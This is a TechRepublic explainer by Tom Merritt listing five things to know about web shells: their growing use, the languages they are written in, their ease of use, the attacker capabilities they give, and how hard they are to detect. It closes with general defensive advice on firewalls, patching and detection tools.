Top 5 things to know about web shells - TechRepublic
Security
TEILEN
Facebook X Pinterest WhatsApp

Top 5 things to know about web shells

The use of web shells is increasing, which could put your business at risk. Tom Merritt lists five things to know about web shells.

Verfasst von
Tom Merritt
Tom Merritt
May 10, 2021
We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details.

Recently, the U.S. FBI was given court authorization to delete web shells from Microsoft Exchange servers. Web shells are a rising menace. They let attackers hide an entry point in your network that’s hard to get rid of. You don’t generally let the FBI go scanning for web shells if it’s an easy fix. Why all the angst? Here are five things to know about web shells.

SEE: How to manage passwords: Best practices and security tips (free PDF) (TechRepublic)

  1. Their use is accelerating. According to Microsoft, the average number of web shells installed from August 2020 to January 2021 was 144,000—that’s almost double the same period from 2019 to 2020.
  2. You can write one in almost any web programming language. Web shells are written in PHP, JSP and ASP among others. They’re easy to slip in if there’s a vulnerability in any web app or internet-facing server. The attacker can find it with Wireshark or by doing a Shodan search. One example was an image that, when requested by a web client, executed code server side to install the shell.
  3. They’re web shells are easy to use once you install them. The command interfaces are instantly usable from any browser—even on a phone.
  4. They let an attacker do anything a legitimate administrator can do. You can use a web shell to run commands and execute code, from crypto mining to malware, and collect system information that can enable lateral movement within the network.
  5. They’re hard to detect. Because they use the language of the web, it’s easy to hide commands inside normal exchanges with a website. Patching a vulnerability doesn’t get rid of a web shell. If you don’t delete it, it remains as a persistent backdoor into your network.

How do you stop web shells? All the usual methods apply. Firewalls, log audits, credential hygiene, network segmentation and patch, patch, patch. The U.S. NSA offers tools for detection and removal on Github as well.

Subscribe to TechRepublic Top 5 on YouTube for all the latest tech advice for business pros from Tom Merritt.


Image: Yuichiro Chino/Moment/Getty Images
Tom Merritt

Tom is an award-winning independent tech podcaster and host of regular tech news and information shows. Tom hosts Sword and Laser, a science fiction and fantasy podcast, and book club with Veronica Belmont. He also hosts Daily Tech News Show, covering the most important tech issues of the day with the smartest minds in technology.